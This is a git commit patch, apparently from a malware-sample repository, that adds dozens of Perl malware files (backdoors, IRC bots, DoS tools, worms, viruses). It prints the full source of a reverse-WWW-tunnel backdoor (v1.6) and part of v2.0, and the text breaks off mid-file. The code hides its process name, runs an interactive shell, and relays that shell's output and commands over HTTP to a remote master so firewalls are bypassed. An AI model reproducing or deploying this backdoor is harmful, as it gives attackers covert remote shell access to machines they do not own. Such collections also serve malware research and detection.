From 06828a0956677dba3d6d16f83b38d877f7b0c826 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Fri, 9 Oct 2020 21:59:39 -0500 Subject: [PATCH] Add files via upload --- Perl/Backdoor.Perl.AEI.16 | 338 ++++ Perl/Backdoor.Perl.AEI.20 | 366 ++++ Perl/Backdoor.Perl.AEI.a | 334 ++++ Perl/Backdoor.Perl.Agent.a | 93 ++ Perl/Backdoor.Perl.Anarchy | 48 + Perl/Backdoor.Perl.IRCBot.aa | 1905 +++++++++++++++++++++ Perl/Backdoor.Perl.IRCBot.ac | 1721 +++++++++++++++++++ Perl/Backdoor.Perl.IRCBot.af | 2578 +++++++++++++++++++++++++++++ Perl/Backdoor.Perl.IRCBot.ai.txt | 2052 +++++++++++++++++++++++ Perl/Backdoor.Perl.IRCBot.n | 1860 +++++++++++++++++++++ Perl/Backdoor.Perl.IRCBot.p | 119 ++ Perl/Backdoor.Perl.IRCBot.r | 1333 +++++++++++++++ Perl/Backdoor.Perl.IRCBot.t | 1265 ++++++++++++++ Perl/Backdoor.Perl.IRCBot.v | 1075 ++++++++++++ Perl/Backdoor.Perl.IRCBot.w | 487 ++++++ Perl/Backdoor.Perl.IRCBot.y | 2114 +++++++++++++++++++++++ Perl/Backdoor.Perl.IRCBot.z | 2116 +++++++++++++++++++++++ Perl/Backdoor.Perl.Psesb | 40 + Perl/Backdoor.Perl.RShell.a | 130 ++ Perl/Backdoor.Perl.RShell.b | 60 + Perl/Backdoor.Perl.Shellbot.B.txt | 2578 +++++++++++++++++++++++++++++ Perl/Backdoor.Perl.Shellbot.a | 665 ++++++++ Perl/Backdoor.Perl.Shellbot.aa | 611 +++++++ Perl/Backdoor.Perl.Shellbot.ah | 568 +++++++ Perl/Backdoor.Perl.Shellbot.aj | 989 +++++++++++ Perl/Backdoor.Perl.Shellbot.o | 515 ++++++ Perl/Backdoor.Perl.Shellbot.s | 515 ++++++ Perl/Backdoor.Perl.Small.a | 46 + Perl/Backdoor.Perl.Small.e | 59 + Perl/Backdoor.Perl.Small.i | 18 + Perl/Backdoor.Perl.Termapp.a | 462 ++++++ Perl/Backdoor.Perl.Udpdor | 145 ++ Perl/Backdoor.Perl.Whoredoor.08 | 73 + Perl/Backdoor.Perl.WinShell.a | 56 + Perl/Backdoor.Perl.Worsyn | 45 + Perl/Backdoor.Perl.Wsh.10 | 192 +++ Perl/Constructor.Perl.DAV.a | 244 +++ Perl/Constructor.Perl.Machd.a | 126 ++ Perl/Constructor.Perl.Msdds.a | 80 + Perl/Constructor.Perl.Msdds.b | 82 + Perl/DoS.Perl.Avirt | 47 + Perl/DoS.Perl.BBDoS.a | 145 ++ Perl/DoS.Perl.BBDoS.c | 57 + Perl/DoS.Perl.Chopsui | 38 + Perl/DoS.Perl.Fusion | 43 + Perl/DoS.Perl.Httux | 44 + Perl/DoS.Perl.Imesh.102 | 57 + Perl/DoS.Perl.Meteor.a | 31 + Perl/DoS.Perl.Nertt | 29 + Perl/DoS.Perl.Proxometron.a | 34 + Perl/DoS.Perl.Raden | 79 + Perl/DoS.Perl.Shafolder | 57 + Perl/DoS.Perl.Small.a | 49 + Perl/DoS.Perl.Tedla | 240 +++ Perl/DoS.Perl.Vftp | 50 + Perl/DoS.Perl.Vqserver | 71 + Perl/HackTool.Perl.AnonyMail | 101 ++ Perl/HackTool.Perl.Aspviewer | 85 + Perl/HackTool.Perl.Cgiluder.b | 85 + Perl/HackTool.Perl.IrBot.c | 248 +++ Perl/HackTool.Perl.IrBot.d | 438 +++++ Perl/HackTool.Perl.Mdctr | 517 ++++++ Perl/HackTool.Perl.Nrgscan | 210 +++ Perl/HackTool.Perl.Small.f | 57 + Perl/HackTool.Perl.TransRoot | 492 ++++++ Perl/HackTool.Perl.Ulgin | 48 + Perl/HackTool.Perl.VulnTest.a | 139 ++ Perl/Net-Worm.Perl.Santy.c | 212 +++ Perl/Net-Worm.Perl.Spyki.a | 109 ++ Perl/Net-Worm.Perl.Spyki.b | 212 +++ Perl/Spoofer.Perl.Nicl | 73 + Perl/Trojan.Perl.InfoSpy | 60 + Perl/Virus.Perl.DirWorm | 13 + Perl/Virus.Perl.Endsnow.a | 31 + Perl/Virus.Perl.Intender | 66 + Perl/Virus.Perl.Nars | 43 + Perl/Virus.Perl.Nirvana | 30 + Perl/Virus.Perl.Qwax | 90 + Perl/Virus.Perl.Rans.a | 41 + Perl/Virus.Perl.Rans.b | 47 + Perl/Virus.Perl.SSHWorm | 56 + Perl/Virus.Perl.Sillycross.a | 35 + Perl/Virus.Perl.Spoon | 43 + Perl/Virus.Perl.Spoon.b | 38 + Perl/Virus.Perl.Tict | 91 + Perl/Virus.Perl.Vich | 87 + Perl/Virus.Perl.WhiteNoise.a | 23 + 87 files changed, 32994 insertions(+) create mode 100644 Perl/Backdoor.Perl.AEI.16 create mode 100644 Perl/Backdoor.Perl.AEI.20 create mode 100644 Perl/Backdoor.Perl.AEI.a create mode 100644 Perl/Backdoor.Perl.Agent.a create mode 100644 Perl/Backdoor.Perl.Anarchy create mode 100644 Perl/Backdoor.Perl.IRCBot.aa create mode 100644 Perl/Backdoor.Perl.IRCBot.ac create mode 100644 Perl/Backdoor.Perl.IRCBot.af create mode 100644 Perl/Backdoor.Perl.IRCBot.ai.txt create mode 100644 Perl/Backdoor.Perl.IRCBot.n create mode 100644 Perl/Backdoor.Perl.IRCBot.p create mode 100644 Perl/Backdoor.Perl.IRCBot.r create mode 100644 Perl/Backdoor.Perl.IRCBot.t create mode 100644 Perl/Backdoor.Perl.IRCBot.v create mode 100644 Perl/Backdoor.Perl.IRCBot.w create mode 100644 Perl/Backdoor.Perl.IRCBot.y create mode 100644 Perl/Backdoor.Perl.IRCBot.z create mode 100644 Perl/Backdoor.Perl.Psesb create mode 100644 Perl/Backdoor.Perl.RShell.a create mode 100644 Perl/Backdoor.Perl.RShell.b create mode 100644 Perl/Backdoor.Perl.Shellbot.B.txt create mode 100644 Perl/Backdoor.Perl.Shellbot.a create mode 100644 Perl/Backdoor.Perl.Shellbot.aa create mode 100644 Perl/Backdoor.Perl.Shellbot.ah create mode 100644 Perl/Backdoor.Perl.Shellbot.aj create mode 100644 Perl/Backdoor.Perl.Shellbot.o create mode 100644 Perl/Backdoor.Perl.Shellbot.s create mode 100644 Perl/Backdoor.Perl.Small.a create mode 100644 Perl/Backdoor.Perl.Small.e create mode 100644 Perl/Backdoor.Perl.Small.i create mode 100644 Perl/Backdoor.Perl.Termapp.a create mode 100644 Perl/Backdoor.Perl.Udpdor create mode 100644 Perl/Backdoor.Perl.Whoredoor.08 create mode 100644 Perl/Backdoor.Perl.WinShell.a create mode 100644 Perl/Backdoor.Perl.Worsyn create mode 100644 Perl/Backdoor.Perl.Wsh.10 create mode 100644 Perl/Constructor.Perl.DAV.a create mode 100644 Perl/Constructor.Perl.Machd.a create mode 100644 Perl/Constructor.Perl.Msdds.a create mode 100644 Perl/Constructor.Perl.Msdds.b create mode 100644 Perl/DoS.Perl.Avirt create mode 100644 Perl/DoS.Perl.BBDoS.a create mode 100644 Perl/DoS.Perl.BBDoS.c create mode 100644 Perl/DoS.Perl.Chopsui create mode 100644 Perl/DoS.Perl.Fusion create mode 100644 Perl/DoS.Perl.Httux create mode 100644 Perl/DoS.Perl.Imesh.102 create mode 100644 Perl/DoS.Perl.Meteor.a create mode 100644 Perl/DoS.Perl.Nertt create mode 100644 Perl/DoS.Perl.Proxometron.a create mode 100644 Perl/DoS.Perl.Raden create mode 100644 Perl/DoS.Perl.Shafolder create mode 100644 Perl/DoS.Perl.Small.a create mode 100644 Perl/DoS.Perl.Tedla create mode 100644 Perl/DoS.Perl.Vftp create mode 100644 Perl/DoS.Perl.Vqserver create mode 100644 Perl/HackTool.Perl.AnonyMail create mode 100644 Perl/HackTool.Perl.Aspviewer create mode 100644 Perl/HackTool.Perl.Cgiluder.b create mode 100644 Perl/HackTool.Perl.IrBot.c create mode 100644 Perl/HackTool.Perl.IrBot.d create mode 100644 Perl/HackTool.Perl.Mdctr create mode 100644 Perl/HackTool.Perl.Nrgscan create mode 100644 Perl/HackTool.Perl.Small.f create mode 100644 Perl/HackTool.Perl.TransRoot create mode 100644 Perl/HackTool.Perl.Ulgin create mode 100644 Perl/HackTool.Perl.VulnTest.a create mode 100644 Perl/Net-Worm.Perl.Santy.c create mode 100644 Perl/Net-Worm.Perl.Spyki.a create mode 100644 Perl/Net-Worm.Perl.Spyki.b create mode 100644 Perl/Spoofer.Perl.Nicl create mode 100644 Perl/Trojan.Perl.InfoSpy create mode 100644 Perl/Virus.Perl.DirWorm create mode 100644 Perl/Virus.Perl.Endsnow.a create mode 100644 Perl/Virus.Perl.Intender create mode 100644 Perl/Virus.Perl.Nars create mode 100644 Perl/Virus.Perl.Nirvana create mode 100644 Perl/Virus.Perl.Qwax create mode 100644 Perl/Virus.Perl.Rans.a create mode 100644 Perl/Virus.Perl.Rans.b create mode 100644 Perl/Virus.Perl.SSHWorm create mode 100644 Perl/Virus.Perl.Sillycross.a create mode 100644 Perl/Virus.Perl.Spoon create mode 100644 Perl/Virus.Perl.Spoon.b create mode 100644 Perl/Virus.Perl.Tict create mode 100644 Perl/Virus.Perl.Vich create mode 100644 Perl/Virus.Perl.WhiteNoise.a diff --git a/Perl/Backdoor.Perl.AEI.16 b/Perl/Backdoor.Perl.AEI.16 new file mode 100644 index 00000000..64dedf31 --- /dev/null +++ b/Perl/Backdoor.Perl.AEI.16 @@ -0,0 +1,338 @@ +# +# Reverse-WWW-Tunnel-Backdoor v1.6 +# (c) 1998 by van Hauser / [THC] - The Hacker's Choice +# Check out http://r3wt.base.org for updates +# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls" +# available at the website above in the "Articles" section. +# + +# Greets to all THC, ADM, arF and #bluebox guys + +# verified to work on Linux, Solaris, AIX and OpenBSD + +# BUGS: some Solaris machines: select(3) is broken, won't work there +# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ... +# we can't make proper receive checks here. Workaround implemented. +# +# HISTORY: +# v1.6: included www-proxy authentication ;-)) +# v1.4: porting to various unix types (and I thought perl'd be portable...) +# v1.3: initial public release of the paper including this tool + +# +# GENERAL CONFIG (except for $MASK, everything must be the same +# for MASTER and SLAVE is this section!) +# +$CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char! +$MASK="vi"; # for masking the program's process name +$PASSWORD="THC"; # anything, nothing you have to rememeber + # (not a real "password" anyway) +# +# MASTER CONFIG (specific for the MASTER) +# +$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080) +$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!) + +# +# SLAVE CONFIG (specific for the SLAVE) +# +$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh) +$DELAY="3"; # time to wait for output after your command(s) +#$TIME="00:01"; # time when to connect to the master (unset if now) +#$DAILY="yes"; # tries to connect once daily if set with something +#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one +#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one +#$PROXY_USER="user"; # username for proxy authentication +#$PROXY_PASSWORD="pass"; # password for proxy authentication +#$DEBUG=""; # for debugging purpose, turn off when in production +$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris + +# END OF CONFIG # nothing for you to do after this point # + +################## BEGIN MAIN CODE ################## + +require 5.002; +use Socket; + +$|=1; # next line changes our process name +if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; } +undef $DAILY if (! $TIME); +if ( !($PROXY) || !($PROXY_PORT) ) { + undef $PROXY; + undef $PROXY_PORT; +} +$protocol = getprotobyname('tcp'); + +if ($ARGV[0] ne "") { + if ($ARGV[0] eq "-h") { + print STDOUT "no commandline option : daemon mode\n"; + print STDOUT "using \"-h\" as option : this help\n"; + print STDOUT "any other option : slave mode\n"; + exit(0); + } else { + print STDOUT "starting in slave mode\n"; + $SLAVE_MODE = "yeah"; + } +} + +if (! $SLAVE_MODE) { + &master; +} else { + &slave; +} +# END OF MAIN FUNCTION + +############### SLAVE FUNCTION ############### + +sub slave { + $pid = 0; + if ($PROXY) { # setting the real config (for Proxy Support) + $REAL_SERVER = $PROXY; + $REAL_PORT = $PROXY_PORT; + $REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT + . $CGI_PREFIX; + $PROXY_SUFFIX = "Pragma: no-cache\n"; + if ( $PROXY_USER && USER_PASSWORD ) { + &base64encoding; + $PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE; + } + } else { + $REAL_SERVER = $SERVER; + $REAL_PORT = $LISTEN_PORT; + $REAL_PREFIX = "GET " . $CGI_PREFIX; + } +AGAIN: if ($pid) { kill 9, $pid; } + if ($TIME) { # wait until the specified $TIME + $TIME =~ s/^0//; $TIME =~ s/:0/:/; + (undef,$min,$hour,undef,undef,undef,undef,undef,undef) + = localtime(time); + $t=$hour . ":" . $min; + while ($TIME ne $t) { + sleep(28); # every 28 seconds we look at the watch + (undef,$min,$hour,undef,undef,undef,undef,undef,undef) + = localtime(time); + $t=$hour . ":" .$min; + } + } + print STDERR "Slave activated\n" if $DEBUG; + if ($DAILY) { # if we must connect daily, we'll + if (fork) { # fork the daily shell process to + sleep(69); # ensure the master control process + goto AGAIN; # won't get stuck by a fucking cmd + } # the user executed. + print STDERR "forked\n" if $DEBUG; + } + $address = inet_aton($REAL_SERVER) || die "can't resolve server\n"; + $remote = sockaddr_in($REAL_PORT, $address); + $forked = 0; +GO: close(THC); + socket(THC, &PF_INET, &SOCK_STREAM, $protocol) + or die "can't create socket\n"; + setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); + if (! $forked) { # fork failed? fuck, let's try again + pipe R_IN, W_IN; select W_IN; $|=1; + pipe R_OUT, W_OUT; select W_OUT; $|=1; + $pid = fork; + if (! defined $pid) { + close THC; + close R_IN; close W_IN; + close R_OUT; close W_OUT; + goto GO; + } + $forked = 1; + } + if (! $pid) { # this is the child process (execs $SHELL) + close R_OUT; close W_IN; close THC; + print STDERR "forking $SHELL in child\n" if $DEBUG; + open STDIN, "<&R_IN"; + open STDOUT, ">&W_OUT"; + open STDERR, ">&W_OUT"; + exec $SHELL || print W_OUT "couldn't spawn $SHELL\n"; + close R_IN; close W_OUT; + exit(0); + } else { # this is the parent (data control + network) + close R_IN; + sleep($DELAY); # we wait $DELAY for the commands to complete + vec($rs, fileno(R_OUT), 1) = 1; + print STDERR "before: allwritten2stdin\n" if $DEBUG; + select($r = $rs, undef, undef, 30); + print STDERR "after : wait for allwritten2stdin\n" if $DEBUG; + sleep(1); # The following readin of the command output + $output = ""; # looks weird. It must be! every system + vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-(( + print STDERR "before: readwhiledatafromstdout\n" if $DEBUG; + while (select($w = $ws, undef, undef, 1)) { + read R_OUT, $readout, 1 || last; + $output = $output . $readout; + } + print STDERR "after : readwhiledatafromstdout\n" if $DEBUG; + print STDERR "before: fucksunprob\n" if $DEBUG; + vec($ws, fileno(W_OUT), 1) = 1; + while (! select(undef, $w=$ws, undef, 0.001)) { + read R_OUT, $readout, 1 || last; + $output = $output . $readout; + } + print STDERR "after : fucksunprob\n" if $DEBUG; + print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG; + print W_OUT "\000" || goto ENDE; + print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG; + while (1) { + read R_OUT, $readout, 1 || last; + last if ($readout eq "\000"); + $output = $output . $readout; + } + print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG; + &uuencode; # does the encoding of the shell output + $encoded = $REAL_PREFIX . $encoded; + $encoded = $encoded . $PROXY_SUFFIX if ($PROXY); + $encoded = $encoded . "\n"; + print STDERR "connecting to remote, fail->exit\n" if $DEBUG; + connect(THC, $remote) || goto ENDE; # connect to master + print STDERR "send encoded data, fail->exit\n" if $DEBUG; + send (THC, $encoded, 0) || goto ENDE; # and send data + $input = ""; + vec($rt, fileno(THC), 1) = 1; # wait until master sends reply + print STDERR "before: wait4answerfromremote\n" if $DEBUG; + while (! select($r = $rt, undef, undef, 0.00001)) {} + print STDERR "after : wait4answerfromremote\n" if $DEBUG; + print STDERR "read data from socket until eod\n" if $DEBUG; + $error="no"; + while (1) { # read until EOD (End Of Data) + print STDERR "?" if $DEBUG; + # OpenBSD 2.2 can't recv here! can't get any data! sucks ... + recv (THC, $readin, 1, 0) || undef $error; + if ((! $error) and (! $BROKEN_RECV)) { goto OK; } + print STDERR "!" if $DEBUG; + goto OK if (($readin eq "\000") or ($readin eq "\n") + or ($readin eq "")); + $input = $input . $readin; + } +OK: print STDERR "\nall data read, entering OK\n" if $DEBUG; + $input =~ s/\n//gs; + &uudecode; # decoding the data from the master + print STDERR "if password not found -> exit\n" if $DEBUG; + goto ENDE if ( $decoded =~ m/^$PASSWORD/s == 0); + $decoded =~ s/^$PASSWORD//; + print STDERR "writing input data to $SHELL\n" if $DEBUG; + print W_IN "$decoded" || goto ENDE; # sending the data + sleep(1); # to the shell proc. + print STDERR "jumping to GO\n" if $DEBUG; + goto GO; + } +ENDE: kill 9, $pid; $pid = 0; + exit(0); +} # END OF SLAVE FUNCTION + +############### MASTER FUNCTION ############### + +sub master { + socket(THC, &PF_INET, &SOCK_STREAM, $protocol) + or die "can't create socket\n"; + setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); + bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n"; + listen(THC, 3) || die "can't listen\n"; # print the HELP + print STDOUT ' +Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ... + +Introduction: Wait for your SLAVE to connect, examine it\'s output and then + type in your commands to execute on SLAVE. You\'ll have to + wait min. the set $DELAY seconds before you get the output + and can execute the next stuff. Use ";" for multiple commands. + Trying to execute interactive commands may give you headache + so beware. Your SLAVE may hang until the daily connect try + (if set - otherwise you lost). + You also shouldn\'t try to view binary data too ;-) + "echo bla >> file", "cat >> file <<- EOF", sed etc. are your + friends if you don\'t like using vi in a delayed line mode ;-) + To exit this program on any time without doing harm to either + MASTER or SLAVE just press Control-C. + Now have fun. +'; + +YOP: print STDOUT "\nWaiting for connect ..."; + $remote=accept (S, THC) || goto YOP; # get the connection + ($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE + $slave=gethostbyaddr($r_slave, AF_INET); # data. + $slave="unresolved" if ($slave eq ""); + print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n"; + select S; $|=1; + select STDOUT; $|=1; + $input = ""; + vec($socks, fileno(S), 1) = 1; + $error="no"; + while (1) { # read the data sent by the slave + while (! select($r = $socks, undef, undef, 0.00001)) {} + recv (S, $readin, 80, 0) || undef $error; + if ((! $error) and (! $BROKEN_RECV)) { + print STDOUT "[disconnected]\n"; + } + $readin =~ s/\r//g; + $input = $input . $readin; + last if ( $input =~ m/\n\n/s ); + } + &hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 ); + $input =~ s/^.*($CGI_PREFIX)\??//s; + $input =~ s/\n.*$//s; + &uudecode; # decoding the data from the slave + &hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 ); + $decoded =~ s/^$PASSWORD//s; + $decoded = "[Warning! No output from remote!]\n>" if ($decoded eq ""); + print STDOUT "$decoded"; # showing the slave output to the user + $output = ; # and get his input. + &uuencode; # encode the data for the slave + send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it + close (S); + print STDOUT "sent.\n"; + goto YOP; # wait for the next connect from the slave +} # END OF MASTER FUNCTION + +###################### MISC. FUNCTIONS ##################### + +sub uuencode { # does the encoding stuff for error-free data transfer via WWW + $output = $PASSWORD . $output; # PW is for error checking and + $uuencoded = pack "u", "$output"; # preventing sysadmins from + $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird + /'zcadefghjklmnopqrstuv' # data. No real + /; # security! + $uuencoded =~ tr/"'"/'b'/; + if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb + $codelength = (length $uuencoded) + (length $REAL_PREFIX) +12; + $cut_length = 4099 - (length $REAL_PREFIX); + $uuencoded = pack "a$cut_length", $uuencoded + if ($codelength > 4111); + } + $encoded = $uuencoded; + $encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE); +} # END OF UUENCODE FUNCTION + +sub uudecode { # does the decoding of the data stream + $input =~ tr/'zcadefghjklmnopqrstuv' + /'\n)=(:;&><,#$*%]!\@"`\\\-' + /; + $input =~ tr/'b'/"'"/; + $decoded = unpack "u", "$input"; +} # END OF UUDECODE FUNCTION + +sub base64encoding { # does the base64 encoding for proxy passwords + $encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD; + $encoded_string = substr(pack('u', $encode_string), 1); + chomp($encoded_string); + $encoded_string =~ tr|` -_|AA-Za-z0-9+/|; + $padding = (3 - length($encode_string) % 3) % 3; + $encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding; + $PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n"; +} # END OF BASE64ENCODING FUNCTION + +sub hide_as_broken_webserver { # invalid request -> look like broken server + send (S, "\n404 File Not Found\n". + "\n

File Not Found

\n\n", 0); + close S; + print STDOUT "Warning! Illegal server access!\n"; # report to user + goto YOP; +} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION + +# END OF PROGRAM # (c) 1998 by + + + + diff --git a/Perl/Backdoor.Perl.AEI.20 b/Perl/Backdoor.Perl.AEI.20 new file mode 100644 index 00000000..5f55b7f7 --- /dev/null +++ b/Perl/Backdoor.Perl.AEI.20 @@ -0,0 +1,366 @@ +# +# Reverse-WWW-Tunnel-Backdoor v2.0 +# (c) 1998-2002 by van Hauser / [THC] - The Hacker's Choice +# Check out http://www.thehackerschoice.com +# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls" +# available at the website above in the "Articles" section. +# + +# Greets to all THC, TESO, ADM and #bluebox guys + +# verified to work on Linux, Solaris, AIX and OpenBSD + +# BUGS: some Solaris machines: select(3) is broken, won't work there +# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ... +# we can't make proper receive checks here. Workaround implemented. +# +# HISTORY: +# v2.0: HTTP 1.0 protocol compliance (finally ;-) +# v1.6: included www-proxy authentication ;-)) +# v1.4: porting to various unix types (and I thought perl'd be portable...) +# v1.3: initial public release of the paper including this tool + +# +# GENERAL CONFIG (except for $MASK, everything must be the same +# for MASTER and SLAVE is this section!) +# +$MODE="POST"; # GET or POST +$CGI_PREFIX="/cgi-bin/orderform";# should look like a valid cgi. +$MASK="vi"; # for masking the program's process name +$PASSWORD="THC"; # anything, nothing you have to rememeber + # (not a real "password" anyway) +# +# MASTER CONFIG (specific for the MASTER) +# +$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080) +$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!) + +# +# SLAVE CONFIG (specific for the SLAVE) +# +$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh) +$DELAY="3"; # time to wait for output after your command(s) +#$TIME="14:39"; # time when to connect to the master (unset if now) +#$DAILY="yes"; # tries to connect once daily if set with something +#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one +#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one +#$PROXY_USER="user"; # username for proxy authentication +#$PROXY_PASSWORD="pass";# password for proxy authentication +#$DEBUG="yes"; # for debugging purpose, turn off when in production +$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris + +# END OF CONFIG # nothing for you to do after this point # + +################## BEGIN MAIN CODE ################## + +require 5.002; +use Socket; + +$|=1; # next line changes our process name +if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; } +undef $DAILY if (! $TIME); +if ( !($PROXY) || !($PROXY_PORT) ) { + undef $PROXY; + undef $PROXY_PORT; +} +$protocol = getprotobyname('tcp'); + +if ($ARGV[0] ne "slave" && $ARGV[0] ne "daemon" && $ARGV[0] ne "master" && $ARGV[1] eq "") { + print STDOUT "Proof-of-Concept Program for the paper \"Placing Backdoors through Firewalls\"\navailable at http://www.thehackerschoice.com in the \"Articles\" section.\n"; + print STDOUT "Commandline options for rwwwshell:\n\tmaster\t- master mode\n\tslave\t- slave mode\n"; + exit(0); +} + +if ($ARGV[0] eq "slave") { + print STDOUT "starting in slave mode\n"; + $SLAVE_MODE = "yeah"; +} + +# check for a correct mode +if ($MODE ne "GET" && $MODE ne "POST") { + print STDOUT "Error: MODE must either be GET or POST, re-edit this perl config\n"; + exit(-1); +} + +if (! $SLAVE_MODE) { + &master; +} else { + &slave; +} +# END OF MAIN FUNCTION + +############### SLAVE FUNCTION ############### + +sub slave { + $pid = 0; + $PROXY_SUFFIX = "Host: " . $SERVER . "\r\nUser-Agent: Mozilla/4.0\r\nAccept: text/html, text/plain, image/jpeg, image/*;\r\nAccept-Language: en\r\n"; + if ($PROXY) { # setting the real config (for Proxy Support) + $REAL_SERVER = $PROXY; + $REAL_PORT = $PROXY_PORT; + $REAL_PREFIX = $MODE . " http://" . $SERVER . ":" . $LISTEN_PORT + . $CGI_PREFIX; + $PROXY_SUFFIX = $PROXY_SUFFIX . "Pragma: no-cache\r\n"; + if ( $PROXY_USER && USER_PASSWORD ) { + &base64encoding; + $PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE; + } + } else { + $REAL_SERVER = $SERVER; + $REAL_PORT = $LISTEN_PORT; + $REAL_PREFIX = $MODE . " " . $CGI_PREFIX; + } + $REAL_PREFIX = $REAL_PREFIX . "?" if ($MODE eq "GET"); + $REAL_PREFIX = $REAL_PREFIX . " HTTP/1.0\r\n" if ($MODE eq "POST"); +AGAIN: if ($pid) { kill 9, $pid; } + if ($TIME) { # wait until the specified $TIME + $TIME =~ s/^0//; $TIME =~ s/:0/:/; + (undef,$min,$hour,undef,undef,undef,undef,undef,undef) + = localtime(time); + $t=$hour . ":" . $min; + while ($TIME ne $t) { + sleep(28); # every 28 seconds we look at the watch + (undef,$min,$hour,undef,undef,undef,undef,undef,undef) + = localtime(time); + $t=$hour . ":" .$min; + } + } + print STDERR "Slave activated\n" if $DEBUG; + if ($DAILY) { # if we must connect daily, we'll + if (fork) { # fork the daily shell process to + sleep(69); # ensure the master control process + goto AGAIN; # won't get stuck by a fucking cmd + } # the user executed. + print STDERR "forked\n" if $DEBUG; + } + $address = inet_aton($REAL_SERVER) || die "can't resolve server\n"; + $remote = sockaddr_in($REAL_PORT, $address); + $forked = 0; +GO: close(THC); + socket(THC, &PF_INET, &SOCK_STREAM, $protocol) + or die "can't create socket\n"; + setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); + if (! $forked) { # fork failed? fuck, let's try again + pipe R_IN, W_IN; select W_IN; $|=1; + pipe R_OUT, W_OUT; select W_OUT; $|=1; + $pid = fork; + if (! defined $pid) { + close THC; + close R_IN; close W_IN; + close R_OUT; close W_OUT; + goto GO; + } + $forked = 1; + } + if (! $pid) { # this is the child process (execs $SHELL) + close R_OUT; close W_IN; close THC; + print STDERR "forking $SHELL in child\n" if $DEBUG; + open STDIN, "<&R_IN"; + open STDOUT, ">&W_OUT"; + open STDERR, ">&W_OUT"; + exec $SHELL || print W_OUT "couldn't spawn $SHELL\n"; + close R_IN; close W_OUT; + exit(0); + } else { # this is the parent (data control + network) + close R_IN; + sleep($DELAY); # we wait $DELAY for the commands to complete + vec($rs, fileno(R_OUT), 1) = 1; + print STDERR "before: allwritten2stdin\n" if $DEBUG; + select($r = $rs, undef, undef, 30); + print STDERR "after : wait for allwritten2stdin\n" if $DEBUG; + sleep(1); # The following readin of the command output + $output = ""; # looks weird. It must be! every system + vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-(( + print STDERR "before: readwhiledatafromstdout\n" if $DEBUG; + while (select($w = $ws, undef, undef, 1)) { + read R_OUT, $readout, 1 || last; + $output = $output . $readout; + } + print STDERR "after : readwhiledatafromstdout\n" if $DEBUG; + print STDERR "before: fucksunprob\n" if $DEBUG; + vec($ws, fileno(W_OUT), 1) = 1; + while (! select(undef, $w=$ws, undef, 0.001)) { + read R_OUT, $readout, 1 || last; + $output = $output . $readout; + } + print STDERR "after : fucksunprob\n" if $DEBUG; + print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG; + print W_OUT "\000" || goto END_IT; + print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG; + while (1) { + read R_OUT, $readout, 1 || last; + last if ($readout eq "\000"); + $output = $output . $readout; + } + print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG; + &uuencode; # does the encoding of the shell output + if ($MODE eq "GET") { + $encoded = $REAL_PREFIX . $encoded . " HTTP/1.0\r\n"; + $encoded = $encoded . $PROXY_SUFFIX; + $encoded = $encoded . "\r\n"; + } else { # $MODE is "POST" + $encoded = $REAL_PREFIX . $PROXY_SUFFIX + . "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + . $encoded . "\r\n"; + } + print STDERR "connecting to remote, fail->exit\n" if $DEBUG; + connect(THC, $remote) || goto END_IT; # connect to master + print STDERR "send encoded data, fail->exit\n" if $DEBUG; + send (THC, $encoded, 0) || goto END_IT; # and send data + $input = ""; + vec($rt, fileno(THC), 1) = 1; # wait until master sends reply + print STDERR "before: wait4answerfromremote\n" if $DEBUG; + while (! select($r = $rt, undef, undef, 0.00001)) {} + print STDERR "after : wait4answerfromremote\n" if $DEBUG; + print STDERR "read data from socket until eod\n" if $DEBUG; + $error="no"; +# while (1) { # read until EOD (End Of Data) + print STDERR "?" if $DEBUG; + # 